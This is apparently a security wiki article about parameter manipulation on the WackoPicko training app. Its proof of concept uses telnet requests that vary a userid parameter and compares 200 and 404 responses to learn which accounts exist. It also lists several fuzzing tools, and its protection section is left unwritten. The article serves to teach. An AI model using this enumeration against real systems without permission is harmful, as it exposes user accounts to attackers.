Description

This attack consists of sending arbitrary values (fuzzing) to a URL that accepts parameters to analyze the behavior of the application. Depending on the way the application is coded, it enables to make deductions (e.g. existence of a userid).

Proof of Concept

A simple test consists of connecting to the application by fuzzing arbitrary values to analyze the HTTP returned code.

The example below shows a 200 OK, telling us that userid #1 exists:

$ telnet 192.168.100.24 80
Trying 192.168.100.24...
Connected to 192.168.100.24.
Escape character is '^]'.
GET /users/sample.php?userid=1 HTTP/1.1
Host: 127.0.0.1

HTTP/1.1 200 OK
Date: Tue, 18 Jan 2011 21:49:31 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: PHPSESSID=u7nlio84alfpdlcjuagmfjcd61; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2678
Content-Type: text/html

But it seems that userid #34 doesn't exist (404 returned)

$ telnet 192.168.100.24 80
Trying 192.168.100.24...
Connected to 192.168.100.24.
Escape character is '^]'.
GET /users/sample.php?userid=34 HTTP/1.1
Host: 127.0.0.1

HTTP/1.1 404 Not Found
Date: Tue, 18 Jan 2011 21:50:26 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: PHPSESSID=j0avgessgvmc0udkc692nfhb73; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 108
Content-Type: text/html

How to detect?

Various fuzzers can help identifying such vulnerabilities.

• Wotobo (fuzzer module)
• JHijack
• JBrofuzz
• Dotdotpwn

How to protect against it?

INCOMPLETE SECTION OR ARTICLE

This section/article is being written and is therefore not complete.
Thank you for your comprehension.

Comments

Talk:WackoPicko/Parameter-Manipulation